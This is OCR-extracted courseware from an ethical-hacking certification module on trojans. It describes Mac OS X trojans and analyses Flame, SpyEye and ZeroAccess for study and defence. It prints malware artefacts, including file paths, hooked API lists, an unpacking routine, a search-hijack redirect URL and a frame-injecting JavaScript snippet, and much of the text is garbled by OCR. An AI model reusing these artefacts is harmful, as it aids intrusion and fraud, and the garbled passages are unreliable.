Monitor Safari or Firefox to record websites and capture screenshots

Send files to the command and control server

_

J

i

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

OSX.Crisis is a Trojan horse that steals potentially sensitive information that is on the victim's system and opens a back door on the compromised computer (victim's system) for future attacks. When the Trojan is executed, it creates the following directories and files:

m i■

OS X T rojan: C risis

/System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworke r_server. xpc/Contents/MacOS/com.apple.mdworker_server /System/Library/Frameworks/Foundation.framework/XPCServices/com.apple.mdworke r_server. xpc/Contents/Resources/ $HOME/Library/LaunchAgents/com.apple.mdworker.plist $HOME/Library/Preferences/j13V7we. app $HOME/Library/ScriptingAdditions/appleHID/Contents/Info.plist $HOME/Library/ScriptingAdditions/appleHID/Contents/MacOS/lUnsA3Ci. Bz7 $HOME/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r
The following are the actions performed by the OSX.Crisis: 9 Q 0 9 Monitor Skype audio traffic Monitor Safari or Firefox to record websites and capture screenshots Record conversations in MS Messenger and Adium Send files to the command and control server
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Module 06 Page 918

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

MAC OS X Trojan: DNSChanger

(•rtifwtf

c EH
ithnai Nm Im

jan uses social engineering techniques to make users download the program and run malicious code

The malware modifies the DNS settings of the active network. The users are forced to download codecs or other movie downloads through QuickTime, etc. Once the download is finished, then the Trojan is attacked, resulting in slow access to the Internet, unnecessary ads popping up on the screen of the computer, etc. This Trojan uses social engineering techniques to make users download the program and run malicious code.

FIGURE 6.37: Attacker injecting MAC OS X Trojan in victim's system through downloads and prompt

Module 06 Page 919

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

MAC OS X Trojan: DNSChanger
(Cont’d)

Q £H
U r t if M | It h K J il U c k M

MAC OS X T rojan: D N S C hanger (C ont’d)
After the user downloads the false codec, the process of tricking and retrieving the user's information continues as follows: 0 0
DNS settings: Local machine's DNS settings are changed to attacker's IP address Playing a video: After the fake codec is installed, a video is played so as not to raise

suspicions 9
HTTP message: A notification is sent to the attacker about the victim's machine using an

HTTP post message 9
Complete control: Hackers take complete control of the victim's MAC OS X computer

Module 06 Page 920

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

M a c OS X T ro ja n : H e ll R a is e r
I ■ and from the victim s system, com pletely m onitor the victim s operations, etc.

C EH
(■WM HMul H a d ■ •

Hell Raiser allow s an attacker to gain access to the victim system and send pictures, pop up chat messages, transfer files to

Chat interface U 6C T nAXQftO «

DC
Victor's parameters ;17*S (________ OSCONNtCT________

DC

*1 HI to ■► • ‫•*׳‬ dlX h • fin n g< 1 (1to• p«n«m n ‫ ׳ז‬0‫י״‬0 1 ‫•!»»• ״‬

‫ג‬ 5 .it—

.

... ----• j t ---Note: The complete coverage of MAC OS X hacking is presented in a separate module Copyright 0 by IG Council. All Rights Reserved. Reproduction is Strictly Prohibited

M ac OS X T rojan: H ell R a ise r
Hell Raiser is malware that gets onto the victim's system when clicked on, the user it is an innocent file. Once access has been gained to the victim's system, the attacker can send pictures, pop-up chat messages, can transfer files to and from the victim's computer, and even can turn ON and turn OFF the system from a remote location. Finally, victim operations can be completely monitored.

Module 06 Page 921

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

T roj a n A n a ly s is : F la m e
Flame, also known as Flamer, sKyWlper, or Skywiper, is modular computer malware discovered in 2012 that attacks computers running the Microsoft Windows operating system The malware is used for targeted cyber espionage in Middle Eastern countries Flame can spread to other systems over a local network (LAN) or via USB stick It can record audio, screenshots, keyboard activity, and network traffic The program also records Skype conversations and can turn infected computers into Bluetooth beacons which attempt to download contact information from nearby Bluetooth-enabled devices

CEH

Copyright O by E6-6«ncil. Ail Rights Reserved. Reproduction is Strictly Prohibited.

& g‫־‬N

O > T ro jan A nalysis: F la m e
Source: http://www.kasperskv.com Flame, also known as Flamer, sKyWlper or Skywiper, is modular computer malware that attacks computers running the Microsoft Windows operating system. This malware is used for targeted cyber espionage. It can spread to other systems over a local network (LAN) or via USB stick. It can record audio, screenshots, keyboard activity, and network traffic. It also records Skype conversations and can turn infected computers into Bluetooth beacons that attempt to download contact information from nearby Bluetooth-enabled devices. The following diagram depicts how an attacker succeeds in installing Flame on a victim's system.

Sends data to attacker

©
Provides a instruction to get data Command and Control Center

Attacker

©

«» ©
o

@>

Sets command and control center

M

■m

3

Redirects to malicious server

*‫•״‬ •

................. © ‫׳‬

f )
U

J ©
Malware Server

©

Infects other hardware in LAN.

Downloads a malware

Infected Hardware in LAN

In order to inject a Trojan onto the victim's system and to gain sensitive information, attackers first set a command and control center and a malware server. Next, the attacker sends a

Module 06 Page 922

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

phishing email to the victim's system and lures him or her to open the link. Once the attacker opens the link, he or she is redirected to the malicious server. As a result, the malware gets downloaded onto the victim's system and the system is infected. This infected machine infects the other hardware connected on the LAN. Thus, the commands from the control and command center are sent to and received from the infected hardware LAN. According to the received commands, the infected hardware LANs send the data to the control and command center.

Module 06 Page 923

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

T roj a n A n a ly s is : F la m e
( Co n t ’d)
The Flame C&C infrastructure, which had been operating for years, went offline immediately after Kaspersky Lab disclosed the discovery of the malware's existence last week

c gh
‫*י‬ ‫י‬-‫—יי י‬

0

According to Kaspersky Lab's sinkhole, infected users were registered in multiple regions including the Middle East, Europe, North America, and Asia-Pacific

Currently there are more than 80 known domains used by Flame for C&C servers and its related domains, which have been registered between 2008 and 2012

B B

The Flame attackers seem to have a high interest in PDF, Office, and AutoCad drawings

During the past 4 years, servers hosting the Flame C&C infrastructure moved between multiple locations, including Hong Kong, Turkey, Germany, Poland, Malaysia, Latvia, the United Kingdom, and Switzerland

The data uploaded to the Flame C&C is encrypted using relatively simple algorithms; stolen documents are compressed using open source Zlib and modified PPDM compression

The Flame C&C domains were registered with a list of fake identities and with a variety of registrars, going back as far as 2008

‫ש‬

Windows 7 64 bit, which we previously recommended as a good solution against infections with other malware, seems to be effective against Flame

h t t p :/ / w w w .k a ip e r s k y .c o m
Copyright O by E6-6«ncil. Ail Rights Reserved. Reproduction is Strictly Prohibited.

T ro jan A nalysis: F la m e (C ont’d)
Source: http://www.kasperskv.com Kaspersky Lab summarizes the results of the analysis about Flame as follows:
9

The Flame C&C infrastructure, which had been operating for years, went offline immediately after Kaspersky Lab disclosed the discovery of the malware's existence recently. Currently there are more than 80 known domains used by Flame for C&C servers and its related domains, which have been registered between 2008 and 2012. During the past four years, servers hosting the Flame C&C infrastructure moved between multiple locations, including Hong Kong, Turkey, Germany, Poland, Malaysia, Latvia, the United Kingdom, and Switzerland. The Flame C&C domains were registered with an impressive list of fake identities and with a variety of registrars, going back as far as 2008. According to Kaspersky Lab's sinkhole, infected users were registered in multiple regions including the Middle East, Europe, North America, and Asia-Pacific. The Flame attackers seem to have a high interest in PDFs, Office, and AutoCad drawings. The data uploaded to the Flame C&C is encrypted using relatively simple algorithms. Stolen documents are compressed using open source Zlib and modified PPDM compression.

9

9

9

9

9 9

Module 06 Page 924

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved, Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Windows 7 64 bit, which we previously recommended as a good solution against infections with other malware, seems to be effective against Flame.

Module 06 Page 925

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

F la m e C & C S e rv e r A n a ly s is
Flame's C&C Server was running on 64-bit Debian 6.0.x OS under OpenVZ and using PHP, Python, and bash programming languages with MySQL database on Apache 2.x web server with self-signed certificates It was accessible over the HTTPS protocol, ports 443 and 8080 The document root directory was /var/www/htdocs/, which has sub-directories and PHP scripts An infected machine was controlled using a message-exchange mechanism based on data containers files joaa'itl 'jg ff» » P T O tM a a 4 e » X J W « P P «

CEH
(«rt1 fw4 ItkNjI lUilwt

* !..■ ► ‫*•י‬.

Contents of the /var/www/htdocs/newsforyou/ directory
Control !*unci

l » •

‫״‬ • '‫־‬ ‫־‬ ‫־‬ •

U a M » ‫״‬ * -

* :V ‫ל‬

Donmlonil dal j

Control panel interface
h t tp : //w w w .k a s p e r s k y .c o m

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited

S p F la m e C&C S erver A nalysis
Source: http://www.kaspersky.com Flame's C&C Server was running on 64-bit Debian 6.0.x OS under OpenVZ and using PHP, Python, and bash programming languages with MySQL database on Apache 2.x web server with self-signed certificates. This server configuration was a typical LAMP (Linux, Apache, MySQL, PHP) setup. It was used to host a web-based control panel as well as to run some scheduled fully automated scripts in the background. It was accessible over the HTTPS protocol, ports 443 and 8080. The document root directory was /var/www/htdocs/, which has sub-directories and PHP scripts. While the systems had PHP5 installed, the code was made to run on PHP4 as well. For example, /var/www/htdocs/newsforyou/Utils.php has the "str_split" function defined that implements the "str_split" function logics from PHP5, which was not available in PHP4. The developers of the C&C code most likely implemented compatibility with PHP4 because they were not sure which one of two major PHP versions would be installed on the C&Cs.

Module 06 Page 926

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Module 06 Page 927

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

F la m e C & C S e rv e r A n a ly s is
(C o n t’d)
C&C can understand several communication protocols including OldProtocol, OldProtocolE, SignupProtocol, and RedProtocol to talk to different clients codenamed SP, SPE, FL, and IP

r ‫ש‬u
Certified | ttfcxjl »U*b«

0

C O M M A N D A N D CONTROL SER V ER FL (Flam e) PROTOCOLS L OldPRotocol RedProtocol N ot yet im plem ented OldProtocollE

t>
CLIENTS •-> HTTP, HTTPS

i
:

1‫י‬
i

‫י‬

■f> SignupProtocol

i

__________ s
Clients and Protocols relations found in this Flame C&C
h ttp : //w w w .k o s p e r s k y .c o m

Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

F lam e C&C S erver A n aly sis (C ont’d)
Source: http://www.kaspersky.com C&C can understand several communication protocols including OldProtocol, OldProtocolE, SignupProtocol, and RedProtocol to talk to different clients codenamed SP, SPE, FL, and IP. A typical client session handled by the C&C started from recognition of the protocol version, then logging of connection information, followed by decoding client request and saving it to the local file storage in encrypted form. All metadata about files received from the client was kept in a MySQL database. The C&C script encrypts all files received from the client. The C&C uses a PGPlike mechanism to encrypt files. First, the file data is encrypted using the Blowfish algorithm in CBC mode (with static IV). The Blowfish key is generated randomly for each file. After file encryption, the Blowfish key is encrypted with a public key using asymmetric encryption algorithm from the openssl_public_encrypt PHP function.

Module 06 Page 928

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

COMMAND AND CONTROL SERVER FL (Flame) PROTOCOLS SP CLIENTS
‫­י‬
­‫י‬

OldPRotocol

‫—יו‬ ‫״‬ RedProtocol
Not yet implemented

SPE

G
Internet: HTTP, HTTPS

■ ‫׳‬ >

OldProtocollE

|

IP

I

■ ‫׳‬ > • SignupProtocol

FIGURE 6.39: Clients and protocol relations found in this Flame C&C

Module 06 Page 929

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Trojan Analysis: SpyEye
J The Trojan makes use of user mode rootkit techniques to hide both its registry key located \ns\deHKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\Current

CE H

Version\Run and the fo ld er containing th e Trojan executable and the configuration
file config.bin J The folder is usually located in th e root directory of th e d rive w h ere the operating system is located

SpyEye is able to inject code in running processes and can perform the following functions: © Capture network traffic t> Send and receive network packets in order to bypass application firewalls e Hide and prevent access to the startup registry entry e Hide and prevent access to the binary code © Hide the own process on injected processes e Steal information from Internet Explorer and Mozilla Firefox
C YWflHXAV e4|*‫״‬ bl)|WlNINt I iri •A CVw»CKM5\5»xccr0:^#l0Cw0!458|\s‫׳‬lNINET d lH 1 1 PS0n<fi0q.*xV : V*lW)CNVS\1yatew2\wnloooricxf[G*0] rtdl H I'M H num erateVakjeKey C V/;lflO OAi'S\wv1| *1132'»wntowr1«x«(&tO ] ‫>׳‬ ‫׳‬Jl.dllNlQuw|On*ctcnFU C\^»JW^5‫־‬ \wt«22«‫^׳‬nk>ooaoxc(&<0ir*dl.dllN(Ro0ir«Tlro:d C \W*M XM \^l«‫*־‬G\*nbpm.x‫(״‬UO] rMI < IH N I'i tl 1foimalcnF1 W C\WIHOCN,/S\.\^t*11:Cl \«r1 k ju u 1 1 *x »(6 < 0 1‫׳‬Wl.dl'NlVJiCorf.iiJ C VXwntooon^x^lUDJ keirvslWdMI1JsNr!slrjr,lwrC0ctw CV/;»JWW‫־‬:\^h‫׳»״‬a U n b ? .a-x»{E4D)ADVAPl3?«IIIC‫>׳‬ p1rncli.(< C V1‫ ״‬n00w‫־‬s\^< 1»‫׳‬n32l», ‫ ׳‬nlooor1axc(&40] CPrPT 32.dl'FF> ‫׳‬:ln ‫־‬ p o r1 C © 1 1 $ tC fe C\^INOOw/S\1yatefnX^nboor\exfl&*Clj USER32 dl 11aruto!eM e*M 0; C VW *C»O N '/S\jv*1»r..S2V^r1lt»yc»rw #x*{&*0)W S2_32 dlivrd CV.vlfJOOWSNMWttiS^nbooaaxeiE^Ojv/ININEr.dlllrttoiiwtQuooOoiiwtf - V/!ylHOCNVj\ty5lB1n^V»nbgQrvexe{fciOJW INIM E T dill litf-fJprt1f‫־‬ l1 *|1 *?1 W CVWt®Ow‫׳‬S\^terH‫־‬2^‫״‬nbgor^x»{&*01WINIMEr.dllHK1/vjtPtq^«HB. CV /‫»» ׳‬OWS\»y«le1»32\>‫»׳‬nbo0f\exc(6<OJW INIME r dlllnlc11v;ICbKHandc C V^tJOtWLVsyjIrfn'iJVwnb^inexrtUU]WININE rdllHltfSeivflrcf.‫^ ״‬ CYw»®OWS\Mten#32^wboor1axef&40iv,lINII'IEr.dl!HRc$ar1:Roau«ft ..

//H /l'iA U d/n *POBAEBXB
77211 8 D 68 B v< 0 9 JM&06/£E29t

7C90D 9TC0 Byte* WPO&tDKSB
7C30C-F9E8B*■ *. JMP0&E2DC2

7C90E4$c 9 B*ec

?D30E5D9B Bytoi jMP0B*O7:CS 7C30E9758 JkFC8«2E78

» 'P :BAP 50^

7 & 3 )2 ?78 B y WJM PC B A 0 n 3 JI

77DnfEB0n>r, JMTT^&r^n 77AEF74B8 S / « JKF:BW E8> 77D48f:l l 0f:y* .‫ י‬JMPQBA0930: 7lAB42a&8B,«.v .KP<»*£AS5 77IB81A78 8*et J»«F C8*E?8«D 771C4ACSBB>*e1 MP0B4£/Asa 771C54CA8B,t»r .HP<*Oi>S33 771C61DC8Byle1 JMP0F/C9415 771C?68B5 0/h [EB. 01. C\ E5 7 77IC768E 2 B*et )•1.941 &XHG E _

API functions hooked by the Trojan within the winlogon.exe virtual address space

http://techblog.avira.com
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

A

T ro jan A nalysis: SpyEye
Source: http://techblog.avira.com

The Trojan makes use of user mode rootkit techniques to hide both its registry key located inside HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run and the folder containing the Trojan executable and the configuration file config.bin. The folder is usually located in the root directory of the drive where the operating system is located. SpyEye is able to inject code in running processes and can perform the following functions: 9 0 Q Q 9 e Capture network traffic Send and receive network packets in order to bypass application firewalls Hide and prevent access to the startup registry entry Hide and prevent access to the binary code Hide the own process on injected processes Steal information from Internet Explorer and Mozilla Firefox

Module 06 Page 930

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

The following API functions are hooked by the Trojan within the winlogon.exe virtual address space:
text text text text text text text .text text text text text .text text text text text text C:\WINDOWS\System32Salgexel4681WININETdllMnternetReadFileExA C:\WINDOWS\System32\alg exe[468] WININET dlllHttpSendRequestW C: \W I ND 0 WS \system32\winlogon. exe[840) ntdll dll! NtE numerateValueKey C: \W I ND 0 WS \system32\winlogon. exe[640j ntdll. dll! NIQuetyD irectotyFile C: \W I ND 0 W S\system32\w1nlogon exe[640j ntdll dll! NtR esumeT hread C: \W I ND 0 WS \system32\winlogon. exe[640j ntdll dll! NtS etl nformationFile CAWIN D 0 WS \system32\winlogon. exe[640] ntdll. dll! NtVdmControl C: \W I ND 0 WS \system32\winlogon. exe[640j kernel32. dll! Flushl nstructionCache C: \W I ND 0 WS \system32\winlogon. exe[640] ADVAR 32. dll! CtyptE ncrypt C: \W I ND 0 WS \system32\winlogon. exe[840] CRYPT 32. dll! PFXI mportCertS tore C: \W I N D 0 WS \system32\winlogon. exe[640] US ER 32. dll! T ranslateM essage C: \W I ND 0 WS \system32\winlogon. exe[640] WS2_32. dll! send C: \W I ND 0 WS \system32\winlogon. exe[640] W l NIN ET.dll! InternetQ uetyO ptiorA C:\WIND0WS\system32\winlogon. exe[840] WININET dll! H ttpO penR equestA C:\WIND0WS\system32\winlogon. exe[840] WININET dll! H ttpAddR equestH e... C: \W I ND 0 WS \system32\winlogon. exe[640] W l NIN ET dll! InternetCloseH andle C: \W I ND 0 W S\system32\winlogon exe[640) W l NIN ET dll! HttpS endR equestA C:\WIND0WS\system32\winlogon. exe[640] WININET dll! HttpSendR equestA . 771F7E9A 8 Bytes JMP 0BAEB2E6 77211808 8 Bytes JMP 0BAEE296 7C90D97G 8 Bytes JMP 0BAD769B 7C90DF5E 8 Bytes JMP 0BAE2DC2 7C90E45F 8 Bytes JMP 0BAF1507 7C90E5D9 8 Bytes JMP 0BAD73E5 7C90E975 8 Bytes JMP 0BAE2E78 7C839277 8 Bytes JMP 0BAD7831 77DF1558 8 Bytes JMP 0BAEA0E1 77AEF748 8 Bytes JMP 0BADE8QA 77D48BCE 8 Bytes JMP 0BAD930C 71AB428A 8 Bytes JMP 0BAEA9B5 771B81A7 8 Bytes JMP 0BAE7B9D 771C4AC5 8 Bytes JMP 0BAE7A88 771C54CA 8 Bytes JMP 0BADA638 771 CGI DC 8 Bytes JMP0BAE8415 771C76B8 5 Bytes [EB. 01, C3. E 9 .7. 771C76BE 2 Bytes [92,94] {XCHG E

FIGURE 6.40: API functions hooked by the Trojan within the winlogon.exe virtual address space

Module 06 Page 931

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Trojan Analysis: SpyEye
(C ont’d)
A fter execution the Trojan connects to a server and sends som e inform ation ab ou t th e system to the server like: © MD5 of the executed sample 6 Operating system version © Computer name 9 Internet Explorer version 8 Username © Version number of the malware
push push push push push le a push push push c a ll le a u e re tn eax i*i*6547i*Bh 4969h 3367h 5047h e c x , [eb p - 1Ch] ecx duord p t r [eb p -O C h] duord p t r [e b p - 1 0h] sub 42F851

CE H

Malware is packed with UPX and a polymorphic decryptor

□ □ □ ^ ‫כ‬ Z] ^ ‫כ‬ ^

svchost exe svchostexe svchost exe System System System System System wniogon exe

1096 1272 1052 4 4 4 4 4 660

UDP UDP UDP TCP TCP UDP UDP UDP TCP

00e5f6a15 00e5f6e15 00e5t8a15 00e5f$al5 00e5#6a15 00e5#6a15 00e5f6a15 00e5t6a15 00e5t6a15

1034 1900 1032 nettxos-ssn rwcfosoftck netb»os-«$ netb*os-dgm rmcjosottds 1083

‫י‬ ■ 00e5f$a15 00e5f6a15 ■ ■ reve*se-m tl-76-76-98-82 gogax com

‫י‬ ‫י‬ 0 0 ■ ■ https

USTENING USTENING

sy n . sen t

M alware injected piece of code within winlogon.exe virtual address space

http://techblog.avira.com

---------Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

T ro jan A nalysis: SpyEye (C ont’d)
Source: http://techblog.avira.com After execution, the Trojan connects to a server and sends some information about the system to the server such as: 0 0 0 0 0 MD5 of the executed sample Operating system version Computer name Internet Explorer version User name

© Version number of the malware
3 □ □ ID 3 svchost exe svchost exe svchost.exe System System System ^ System ^ System ^ winlogon exe 1096 1272 1052 4 4 4 4 4 660 UDP UDP UDP TCP TCP UDP UDP UDP TCP 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 1034 1900 1032 netbios-ssn m ciosoft-ds netbios-ns netbios-dgm rm ciosott-ds 1063 ­ ‫י‬ ■ ■ 00e5f6a15 00e»6a15 ■ ‫י‬ ■ reve»se-m tl*76-76-9882‫ ־‬gogax com

Z 3

" " 0 0 “ " " hltps

USTENING USTENING

SYN_SENT

FIGURE 6.41: Malware injected piece of code within winlogon.exe virtual address space

Module 06 Page 932

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Malware is packed with UPX and a polymorphic decryptor. In the code snippet that follows, you can see a call to another routine after the end of the usual UPX decryption: call sub 42F851.
push push push push push push lea push push push call lea ue retn

eax 44651*74Bh 496 9h 3 3 6 7h 5 047 h ecx, [ebp -1 Ch] ecx dijord ptr [eb p-O Ch ] d u o rd ptr [e bp-10h] subJ*2F851

FIGURE 6.42: Malware is packed with UPX and a polymorphic decryptor

Module 06 Page 933

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

T ro ja n A n a ly sis: Z ero A c c e ss
ZeroAccess, also known as "Smiscer" or "Max++ rootkit," is a malicious Windows threat used to generate revenue primarily through pay-per-click fraud It arrives through various vectors, including web exploit kits and social engineering attacks, and uses low-level rootkit functionality to remain persistent and stealth ZeroAccess downloads fake security software, performs click fraud and search engine poisoning

CEH
(«rt1fw4 itfcwal Nm Im

SSSE39
lcc learn ■Uddtot N ovkt

I-O rtt

jwon:

*v»xi5

U

Example advertisement for the Clicklce payper-dick network

• ckklic Pay P er dtk
Dear sirs! W* proud to armour*.• 4 ‫ *••זו‬modem tokAum h• POC 04ffc.. cafed Cfecklc* PPC clickicocom CMcklce Team ncfcides professionals of vanous liekJs. who are woriong every day to make th« PPC even better tor you. Apart from generous bids. Cbddce P K offers you tf*e fo*o*nng: 1. Advanced f*«d vvrwon 2. Our admnntratrve nterfaee mrixies a number or uOMies for traffic proeesartg. S. To *•irjjlify your work «M th 6tat*tKt, > t * pouAitv to choo•• CMf-baMd lira• »Uft for it. 4. An entire eoaecttcn of fee< ts «s prowled (PTip feeds. PuMc feeds, image feeds, Javascript and XML feeds). 5. Databases of specwlued keywords aro prowtod. ■ t is afco posutHe to obtan niche-specific customuod keyword baset froc of charge based on webmaster's criteria. 0. Our a 4>port can be reached via ICQ. live Chat, e*mal or ticket system.

Just give it a try and then make an informed decision. :) dcbce.com

http.//w ww.symantec.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

T ro jan A nalysis: Z eroA ccess
Source: http://www.symantec.com ZeroAccess, also known as "Smiscer" or "Max++ rootkit," is a malicious Windows threat used to generate revenue primarily through pay-per-click fraud. ZeroAccess uses low-level rootkit functionality to remain persistent and stealth. It arrives through various vectors, including web exploit kits and social engineering attacks. Although ZeroAccess contains generic backdoor functionality that could be used for multiple purposes, it has been observed downloading fake security software, performing click fraud, and searching engine poisoning.
Click fraud schem e

Upon infection, ZeroAccess will install additional payload modules, downloaded through its back door. Generally, this is an executable that performs click fraud. This click fraud scheme has been observed to utilize more than one pay-per-click affiliate network. Advertisers sign up with ad networks that in turn contract website owners who are willing to display advertisements on their websites in exchange for a small commission. The ad networks charge the advertisers for distributing and displaying their ads and pay the website owners a small commission each time a visitor views (pay-per-view) or clicks (pay-per-click) on the ads.

Module 06 Page 934

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

• d c k lc e Pay Per Cfck Dear Srs! We are proud to announce a new modem solution for PPC tra ffic, ca led Ckcklce PPC clickice.com CUcklce Team includes professionals o f various fields, who are worlung every day to make this PPC even b e tte r for you. Apart from generous bids, Clicklce PPC offers you the fo lo w rx): 1. Webmasters Advanced feed version. 2 . Our administrative interface includes a number o f utihbes for tra ffic processng. 3 . To swnplify your work w ith sta tistics, it is possible to choose GMT-based dme sh ift for it. 4. An entire collection o f feeds is provided (Php feeds, Pubfcc Feeds, Image feeds, JavaScript and XML feeds). 5 . Databases o f specialized keywords are provided; it is also posstole to obtavi mche-specific customized keyword bases free o f charge based on webmaster's cnteria. 6. Our support can be reached via ICQ, Live Chat, e-mail or ticke t system.

Just give it a try and then make an informed decision. :) cbck1ce.com

FIGURE 6.43: Example advertisement for the Clicklce pay-per-click network

Module 06 Page 935

Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

T ro ja n A n a ly sis: Z ero A c c e ss
(C ont’d)
J In addition to generating revenue through pay-per-click networks, ZeroAccess hijacks user's searches When an infected user searches in popular search engines, (including google.com, bing.com, icq.com, yahoo.com, ask.com, and aol.com), ZeroAccess sends an additional GET request similar to the following:

C EH
Urt1fw4 ilhiul lUtbM

An example of returned H TM L can be seen below

http: //suzuki111x 111[ .] an/r/redirect.php ?Xd= 9de5404ac67a404a0ela775f212cd210 & u = 1 9 8 & cv= 1 5 0 & sv= 1 5 & o s= 5 0 1 .8 0 4.x86
This causes an additional pop-up window or tab to be created, the new window or tab will contain search results for the original search query with hijacked links or additional content

function FormatRedirect(ref, title) { body = "<html><head> <title>" + title + "</title> </head><framesetxframe src=\ "http://" + ref + "\"> </frameset></html>"; AddPage("www.google.com.hk/ search?q=car&hl=zh-CN&source= hp&gbv=l", 2, null, 0, "HTTP/1.1 200\r\nConnection: close\r\ nCache-Control: no-cache\r\ nPragma: no-cache\r\nContentLength: " + body.length + "\r\n\r\n" + body);

}
FormatRedirect("kozanekozasearchsys tern.com/?search=car&subid=198&key=4 15db60c8aa81c 0bed€8", "car");

http://www.symontec.com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

ggjj T rojan A nalysis: Z eroA ccess (C ont’d)
Source: http://www.symantec.com In addition to generating revenue through pay-per-click networks, ZeroAccess hijacks users' searches. When an infected user searches in popular search engines (including google.com, bing.com, icq.com, yahoo.com, ask.com, and aol.com), ZeroAccess sends an additional GET request similar to the following: http://suzukimxml‫־‬.‫־‬lcn/r/redirect.php?id=9de5404ac67a404a0ela775f212cd210&u=198&cv=l 50&sv=15&os=501.804.x86 This causes an additional pop-up window or tab to be created. The new window or tab will contain search results for the original search query with hijacked links or additional content. An example of returned HTML can be seen as follows.

Module 06 Page 936

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

1 :

<jst> function FormatRedirect(ref, title) { body = "<html><head> <title>" + title + "</title> </head><framesetxframe src=\ ‫״‬http://‫ ״‬+ ref + "\‫>״‬ </frameset></html>"; AddPage("www.google.com.hk/ search?q=car&hl=zh-CN&source= hp&gbv=l",2,null, 0, "HTTP/1.1 200\r\nConnection: close\r\ nCache-Control: no-cache\r\ nPragma: no-cache\r\nContentLength: " + body.length + "\r\n\r\n" + body);

4:

}

FormatRedirect( "kozanekozasearchsys tem.com/?search=car&subid=l98 &key=4 15db60c8aa81c 0bed68", "car‫;)״‬
FIGURE 6.44: An example of returned HTML

Module 06 Page 937

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

T ro ja n A n a ly sis: Z ero A c c e ss
(Cont’d)
